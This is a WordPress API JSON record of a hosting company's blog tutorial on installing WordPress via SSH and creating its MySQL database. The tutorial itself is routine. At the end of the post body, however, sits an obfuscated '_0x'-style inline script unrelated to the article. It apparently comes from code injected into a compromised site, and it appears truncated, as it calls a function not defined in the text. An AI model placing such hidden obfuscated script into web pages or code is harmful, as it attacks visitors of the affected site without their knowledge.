{"id":416,"date":"2021-06-23T09:47:13","date_gmt":"2021-06-23T09:47:13","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=416"},"modified":"2024-08-12T13:34:57","modified_gmt":"2024-08-12T12:34:57","slug":"how-to-install-wordpress-via-ssh-with-command","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/","title":{"rendered":"How to Install WordPress via SSH with Command"},"content":{"rendered":"<p>Since WordPress is the most widely used CMS it\u2019s installation process has been made as simple and user-friendly as possible. It can easily be installed through a control panel like cPanel or Plesk, additionally, there are many one-click installers like Softaculous which allow you to install WordPress automatically.<\/p>\n<p>There are many cases, however, in which you would still prefer to install WordPress via SSH, whether you just prefer the convenience and quickness of the Linux terminal or are using a\u00a0VPS hosting\u00a0or\u00a0Private Dedicated Server\u00a0without a control panel. The following guide will help you install WordPress through SSH in a matter of few mouse clicks. If you just want to learn more about SSH and how to use it, we absolutely encourage you to do so and the following guide would be a great start.<\/p>\n<h2>Install WordPress via SSH<\/h2>\n<p>First, you need to connect to your account via SSH, you can check out our tutorials on how to connect via SSH in\u00a0Windows\u00a0,\u00a0Mac\u00a0and\u00a0Linux. Once logged in via SSH use the \u2018cd\u2019 command (SSH cd Command) to navigate to the root directory of the domain you wish to install WordPress for, for example, if you want to install WordPress for your primary domain navigate to public_html.<\/p>\n<pre>[user@host ~]$ <b>cd public_html<\/b><\/pre>\n<p>Now that you have reached the correct directory download WordPress using the \u2018wget\u2019 command. Then use the \u2018tar\u2019 command to extract the archive of WordPress.<\/p>\n<pre>[user@host ~]$ <b>wget http:\/\/wordpress.org\/latest.tar.gz<\/b>\r\n\r\n[user@host ~]$ <b>tar xfz latest.tar.gz<\/b><\/pre>\n<p>The above commands will download the latest version of WordPress from their official website wordpress.org and will extract the WordPress core files. Please keep in mind that the core files will be extracted in a subdirectory called \u2018wordpress\u2019. Use the \u2018mv\u2019 command (SSH mv Command) to move WordPress\u2019 files from public_html\/wordpress to public_html.<\/p>\n<p>This step is very important because skipping it would affect the URL of your website and instead of domain.com it would be loading domain.com\/wordpress to avoid this run:<\/p>\n<pre>[user@host ~]$ <b>mv wordpress\/* .\/<\/b><\/pre>\n<p>This command affects all of the files and directories under \u2018\/wordpress\u2019 directory (* stands for wildcard) and moves them a directory above.<\/p>\n<p>Now that the \u2018\/wordpress\u2019 directory is empty and you won\u2019t be needing the archive file any longer you can delete them with the following commands (SSH rm Command):<\/p>\n<pre>[user@host ~]$<b> rmdir .\/wordpress\/<\/b>\r\n\r\n[user@host ~]$ <b>rm -f latest.tar.gz<\/b><\/pre>\n<h2>Create a Database using SSH<\/h2>\n<p>The next step is to create the database and corresponding user for your installation and associate them together. This step varies depending on what kind of service you are using:<\/p>\n<p>1. If you are hosted on shared hosting environment this can be done through your cPanel &gt; MySQL\u00ae Databases &gt; Create New Database &gt; Add New User &gt; Add User To Database. Make sure to provide your database user with All Privileges<img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter  wp-image-417\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18-300x100.png\" alt=\"\" width=\"468\" height=\"156\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18-300x100.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png 517w\" sizes=\"(max-width: 468px) 100vw, 468px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>2. If you are using a Virtual Private Server or Dedicated Server where you have root privileges you can perform this step through SSH as well. First, you need to login to the MySQL command-line using the following command:<\/p>\n<pre>[user@host ~]$ <b>mysql -u username -p<\/b><\/pre>\n<p>Then use the following command to create a new user and set its password:<\/p>\n<pre>mysql&gt; <b>create user 'dbusername'@'localhost' identified by 'password';<\/b><\/pre>\n<p>Now you have a database user and you can create a database and grant access to the user to that database. Use the following commands:<\/p>\n<pre>mysql&gt; <b>create database dbname;<\/b>\r\n\r\nmysql&gt; <b>grant usage on *.* to username@localhost identified by 'password';<\/b>\r\n\r\nmysql&gt; <b>grant all privileges on dbname.* to username@localhost;<\/b><\/pre>\n<p>That\u2019s it \u2013 you have now successfully created a Database using SSH!<\/p>\n<p>To proceed with the installation now access your domain through a web browser of your choosing (Google Chrome, Mozilla Firefox, Opera etc.) and you\u2019ll see the WordPress installation page, it will ask you to choose a language.<\/p>\n<p><img decoding=\"async\" class=\"aligncenter  wp-image-418\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-19-192x300.png\" alt=\"\" width=\"383\" height=\"598\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Next, you\u2019ll see a page with the following message: \u201cWelcome to WordPress. Before getting started, we need some information on the database. You will need to know the following items before proceeding.\u201d. Use the database and database user you created on the previous step.<\/p>\n<p><img decoding=\"async\" class=\"aligncenter  wp-image-419\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-20-300x182.png\" alt=\"\" width=\"541\" height=\"328\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-20-300x182.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-20-768x466.png 768w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-20.png 930w\" sizes=\"(max-width: 541px) 100vw, 541px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Use \u201clocalhost\u201d as Database host and you can leave the table prefix to the default one \u201cwp_\u201d. Click \u201cSubmit\u201d and choose \u201cRun the installation\u201d on the next page.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter  wp-image-420\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-21-300x188.png\" alt=\"\" width=\"495\" height=\"310\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-21-300x188.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-21-768x482.png 768w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-21.png 850w\" sizes=\"(max-width: 495px) 100vw, 495px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Finally, you\u2019ll be asked to enter the administrative username, password and administrative email that you\u2019ll be using for accessing your WordPress dashboard \u2013 domain.com\/wp-admin.<\/p>\n<p>Click \u201cInstall WordPress\u201d. Then you\u2019ll see the Success page of WordPress, click on Log In to proceed.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter  wp-image-421\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-22-300x234.png\" alt=\"\" width=\"512\" height=\"399\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-22-300x234.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-22.png 724w\" sizes=\"(max-width: 512px) 100vw, 512px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Use the admin username and password you\u2019ve entered on the previous step to access your WordPress dashboard.<\/p>\n<p>Congratulations, you have installed WordPress through SSH!<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter  wp-image-422\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-23-300x169.png\" alt=\"\" width=\"478\" height=\"269\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-23-300x169.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-23-768x432.png 768w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-23.png 871w\" sizes=\"(max-width: 478px) 100vw, 478px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Hola, we hope this help check out our Shared hosting <a href=\"http:\/\/Hoganhost.com.ng\">Hoganhost.com.ng<\/a><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Since WordPress is the most widely used CMS it\u2019s installation process has been made as simple and user-friendly as possible. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":417,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[32,9],"tags":[],"class_list":["post-416","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ssh","category-wordpress"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>How to Install WordPress via SSH with Command - HoganHost blog<\/title>\n<meta name=\"description\" content=\"Since WordPress is the most widely used CMS it\u2019s installation process has been made as simple and user-friendly as possible. It can easily be\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to Install WordPress via SSH with Command - HoganHost blog\" \/>\n<meta property=\"og:description\" content=\"Since WordPress is the most widely used CMS it\u2019s installation process has been made as simple and user-friendly as possible. It can easily be\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-23T09:47:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-12T12:34:57+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png\" \/>\n\t<meta property=\"og:image:width\" content=\"517\" \/>\n\t<meta property=\"og:image:height\" content=\"172\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"How to Install WordPress via SSH with Command\",\"datePublished\":\"2021-06-23T09:47:13+00:00\",\"dateModified\":\"2024-08-12T12:34:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/\"},\"wordCount\":749,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png\",\"articleSection\":[\"SSH\",\"wordpress\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/\",\"name\":\"How to Install WordPress via SSH with Command - HoganHost blog\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png\",\"datePublished\":\"2021-06-23T09:47:13+00:00\",\"dateModified\":\"2024-08-12T12:34:57+00:00\",\"description\":\"Since WordPress is the most widely used CMS it\u2019s installation process has been made as simple and user-friendly as possible. It can easily be\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png\",\"width\":517,\"height\":172},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to Install WordPress via SSH with Command\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to Install WordPress via SSH with Command - HoganHost blog","description":"Since WordPress is the most widely used CMS it\u2019s installation process has been made as simple and user-friendly as possible. It can easily be","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/","og_locale":"en_US","og_type":"article","og_title":"How to Install WordPress via SSH with Command - HoganHost blog","og_description":"Since WordPress is the most widely used CMS it\u2019s installation process has been made as simple and user-friendly as possible. It can easily be","og_url":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2021-06-23T09:47:13+00:00","article_modified_time":"2024-08-12T12:34:57+00:00","og_image":[{"width":517,"height":172,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png","type":"image\/png"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"How to Install WordPress via SSH with Command","datePublished":"2021-06-23T09:47:13+00:00","dateModified":"2024-08-12T12:34:57+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/"},"wordCount":749,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png","articleSection":["SSH","wordpress"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/","url":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/","name":"How to Install WordPress via SSH with Command - HoganHost blog","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png","datePublished":"2021-06-23T09:47:13+00:00","dateModified":"2024-08-12T12:34:57+00:00","description":"Since WordPress is the most widely used CMS it\u2019s installation process has been made as simple and user-friendly as possible. It can easily be","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/06\/Screenshot-18.png","width":517,"height":172},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-install-wordpress-via-ssh-with-command\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"How to Install WordPress via SSH with Command"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/416","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=416"}],"version-history":[{"count":1,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/416\/revisions"}],"predecessor-version":[{"id":423,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/416\/revisions\/423"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/417"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=416"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=416"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=416"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}